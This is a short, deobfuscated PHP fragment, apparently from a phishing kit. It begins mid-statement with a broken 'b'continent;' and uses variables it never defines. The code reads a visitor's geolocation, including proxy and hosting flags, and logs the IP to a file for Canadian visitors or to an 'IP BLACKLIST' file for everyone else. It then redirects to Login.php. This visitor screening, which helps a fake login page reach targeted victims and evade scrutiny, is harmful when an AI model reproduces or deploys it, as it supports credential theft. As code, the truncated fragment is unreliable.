/* Decoded by unphp.net */ ?>b'continent; $_SESSION[\'country\'] = $country = $details->country; $_SESSION[\'countryCode\'] = $countryCode = $details->countryCode; $_SESSION[\'proxy\'] = $proxy = $details->proxy; $_SESSION[\'hosting\'] = $hosting = $details->hosting; $continent = $_SESSION[\'continent\']; $country = $_SESSION[\'country\']; $countryCode = $_SESSION[\'countryCode\']; $proxy = $_SESSION[\'proxy\']; $hosting = $_SESSION[\'hosting\']; if ($country == \'Canada\'){ $file = fopen("SA-IPS.txt","a"); fwrite($file,"|ip| ==>> $ip <@> |country| ==>> ".$_SESSION[\'country\']." Details "); header( "refresh:1;url=Login.php" ); }else{ $file = fopen("OTHER IP.txt","a"); fwrite($file,"|ip| ==>> $ip <@> |country| ==>> ".$_SESSION[\'country\']." IP BLACKLIST "); header( "refresh:1;url=Login.php" ); } ?> '